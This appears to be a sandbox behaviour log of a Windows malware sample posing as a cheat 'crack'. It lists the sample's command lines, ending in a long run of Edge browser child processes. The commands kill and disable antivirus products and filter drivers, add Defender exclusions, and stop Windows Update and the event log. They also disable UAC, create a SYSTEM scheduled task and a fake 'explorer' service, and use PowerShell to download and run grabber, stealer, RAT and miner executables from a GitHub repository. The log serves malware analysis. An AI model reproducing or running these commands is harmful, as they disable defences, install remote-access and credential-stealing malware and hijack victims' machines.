C:\Windows\system32\sc.exesc stop CmdAgent3⤵
- Launches sc.exe
PID:1472
-
-
C:\Windows\system32\sc.exesc config CmdAgent start= disabled3⤵
- Launches sc.exe
PID:4896
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM sophosav.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5720
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM savservice.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5664
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM sophoshealth.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:5876
-
-
C:\Windows\system32\sc.exesc stop "Sophos AV"3⤵
- Launches sc.exe
PID:1756
-
-
C:\Windows\system32\sc.exesc config "Sophos AV" start= disabled3⤵
- Launches sc.exe
PID:1992
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM psanhost.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4552
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM pavsrv.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3300
-
-
C:\Windows\system32\taskkill.exetaskkill /F /IM psimsvc.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2052
-
-
C:\Windows\system32\sc.exesc stop PandaSecurity3⤵
- Launches sc.exe
PID:1816
-
-
C:\Windows\system32\sc.exesc config PandaSecurity start= disabled3⤵
- Launches sc.exe
PID:1780
-
-
C:\Windows\system32\fltMC.exefltmc unload kl13⤵
- Suspicious use of AdjustPrivilegeToken
PID:5128
-
-
C:\Windows\system32\fltMC.exefltmc unload bdsvm3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5196
-
-
C:\Windows\system32\fltMC.exefltmc unload aswSP3⤵
- Suspicious use of AdjustPrivilegeToken
PID:320
-
-
C:\Windows\system32\fltMC.exefltmc unload avgmfx863⤵
- Suspicious use of AdjustPrivilegeToken
PID:2872
-
-
C:\Windows\system32\fltMC.exefltmc unload tmcomm3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2324
-
-
C:\Windows\system32\fltMC.exefltmc unload mbamswissarmy3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4500
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Services\kl1" /v Start /t REG_DWORD /d 4 /f3⤵PID:2804
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Services\bdsvm" /v Start /t REG_DWORD /d 4 /f3⤵PID:4164
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Services\aswSP" /v Start /t REG_DWORD /d 4 /f3⤵PID:1432
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Services\avgmfx86" /v Start /t REG_DWORD /d 4 /f3⤵PID:3672
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Services\tmcomm" /v Start /t REG_DWORD /d 4 /f3⤵PID:2728
-
-
C:\Windows\system32\reg.exereg add "HKLM\SYSTEM\CurrentControlSet\Services\mbamswissarmy" /v Start /t REG_DWORD /d 4 /f3⤵PID:3748
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "CrackTask" /tr "C:\ProgramData\Crack\Launcher.exe" /sc once /st 00:00 /ru SYSTEM /f3⤵
- Scheduled Task/Job: Scheduled Task
PID:4276
-
-
C:\Windows\system32\schtasks.exeschtasks /run /tn "CrackTask"3⤵PID:2940
-
-
C:\Windows\system32\schtasks.exeschtasks /delete /tn "CrackTask" /f3⤵PID:3796
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest 'https://github.com/seven7174o/ABUZA-GAY/raw/refs/heads/main/GRABBER.exe' -OutFile 'Launcher.exe'"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5508
-
-
C:\Windows\system32\attrib.exeattrib +h "C:\ProgramData\Crack\Launcher.exe" /s /d3⤵
- Views/modifies file attributes
PID:2920
-
-
C:\ProgramData\Crack\Launcher.exeLauncher.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:5176
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest 'https://github.com/seven7174o/ABUZA-GAY/raw/refs/heads/main/STEALER.exe' -OutFile 'start.exe'"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5816
-
-
C:\Windows\system32\attrib.exeattrib +h "C:\ProgramData\Crack\start.exe" /s /d3⤵
- Views/modifies file attributes
PID:4320
-
-
C:\ProgramData\Crack\start.exestart.exe3⤵
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
PID:2648
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest 'https://github.com/seven7174o/ABUZA-GAY/raw/refs/heads/main/RAT.exe' -OutFile 'explorer.exe'"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5388
-
-
C:\Windows\system32\attrib.exeattrib +h "C:\ProgramData\Crack\explorer.exe" /s /d3⤵
- Views/modifies file attributes
PID:5796
-
-
C:\ProgramData\Crack\explorer.exeexplorer.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "$ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest 'https://github.com/seven7174o/ABUZA-GAY/raw/refs/heads/main/MINER.exe' -OutFile 'explorerS.exe'"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3488
-
-
C:\Windows\system32\attrib.exeattrib +h "C:\ProgramData\Crack\explorerS.exe" /s /d3⤵
- Views/modifies file attributes
PID:5476
-
-
C:\ProgramData\Crack\explorerS.exeexplorerS.exe3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4464 -
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4660
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart4⤵PID:2800
-
C:\Windows\system32\wusa.exewusa /uninstall /kb:890830 /quiet /norestart5⤵PID:748
-
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop UsoSvc4⤵
- Launches sc.exe
PID:4284
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop WaaSMedicSvc4⤵
- Launches sc.exe
PID:1596
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop wuauserv4⤵
- Launches sc.exe
PID:1908
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop bits4⤵
- Launches sc.exe
PID:2604
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop dosvc4⤵
- Launches sc.exe
PID:5684
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 04⤵
- Power Settings
PID:5236
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 04⤵
- Power Settings
- Suspicious use of AdjustPrivilegeToken
PID:2072
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-ac 04⤵
- Power Settings
PID:4652
-
-
C:\Windows\system32\powercfg.exeC:\Windows\system32\powercfg.exe /x -standby-timeout-dc 04⤵
- Power Settings
PID:1816
-
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3712
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe delete "explorer"4⤵
- Launches sc.exe
PID:5196
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe create "explorer" binpath= "C:\ProgramData\Windows\explorer.exe" start= "auto"4⤵
- Launches sc.exe
PID:5788
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe stop eventlog4⤵
- Launches sc.exe
PID:888
-
-
C:\Windows\system32\sc.exeC:\Windows\system32\sc.exe start "explorer"4⤵
- Launches sc.exe
PID:3044 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:2748
-
-
-
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- Modifies registry key
PID:6016
-
-
C:\Windows\system32\PING.EXEping -n 2 127.0.0.13⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:6056
-
-
C:\Windows\system32\cscript.execscript //nologo temp.vbs3⤵PID:400
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4912
-
-
-
C:\Windows\system32\PING.EXEping -n 4 127.0.0.13⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4864
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://t.me/StopCrashingsBot?start=CHEATCRACK"3⤵PID:4900
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-skip-compat-layer-relaunch https://t.me/StopCrashingsBot?start=CHEATCRACK4⤵
- Drops file in Program Files directory
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:4164 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x258,0x25c,0x260,0x254,0x2f4,0x7ffc460ef208,0x7ffc460ef214,0x7ffc460ef2205⤵PID:4572
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1924,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=308 /prefetch:35⤵PID:5880
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2296,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=2288 /prefetch:25⤵PID:3892
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2512,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=3148 /prefetch:85⤵PID:4568
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3408,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=3416 /prefetch:15⤵PID:3516
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3420,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=3448 /prefetch:15⤵PID:5816
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4884,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=4896 /prefetch:15⤵PID:4896
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5156,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=5192 /prefetch:85⤵PID:3580
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5180,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=5212 /prefetch:85⤵PID:2372
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5528,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=5372 /prefetch:85⤵PID:5484
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5736,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=6076 /prefetch:85⤵PID:3908
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5736,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=6076 /prefetch:85⤵PID:2212
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3436,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=5616 /prefetch:85⤵PID:724
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5872,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=3464 /prefetch:85⤵PID:920
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5832,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=6336 /prefetch:85⤵PID:1744
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5888,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=6384 /prefetch:85⤵PID:3372
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5860,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=6388 /prefetch:85⤵PID:3420
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5220,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=5308 /prefetch:85⤵PID:3400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5900,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=6484 /prefetch:85⤵PID:5884
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5160,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=2688 /prefetch:85⤵PID:728
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6536,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=2692 /prefetch:85⤵PID:4840
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6392,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=5388 /prefetch:85⤵PID:2176
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5392,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=5432 /prefetch:85⤵PID:2160
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5212,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=6424 /prefetch:85⤵PID:6104
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6484,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=5396 /prefetch:85⤵PID:2656
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6360,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=5200 /prefetch:85⤵PID:3912
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6396,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=6408 /prefetch:85⤵PID:3636
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6096,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=5856 /prefetch:85⤵PID:5156
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6340,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=6372 /prefetch:85⤵PID:1744
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6292,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=820 /prefetch:85⤵PID:8144
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=6348,i,1691629501804146698,8649394953634553656,262144 --variations-seed-version --mojo-platform-channel-handle=820 /prefetch:85⤵PID:6272
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start2⤵PID:1732
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
- Suspicious use of SetWindowsHookEx
PID:5440
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start3⤵PID:5060
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3556
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3740
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3900
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4140
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:4692
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:5616
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:6124
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p1⤵PID:5168
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:2164
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
PID:2256
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1652
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:3992
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:6092
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:3116
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:1036
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:2908
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s camsvc1⤵PID:1624
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:1956
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3852
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
PID:3076
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
PID:3960
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵PID:684
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:4840
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵PID:2788
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵PID:5536
-
C:\ProgramData\Windows\explorer.exeC:\ProgramData\Windows\explorer.exe1⤵
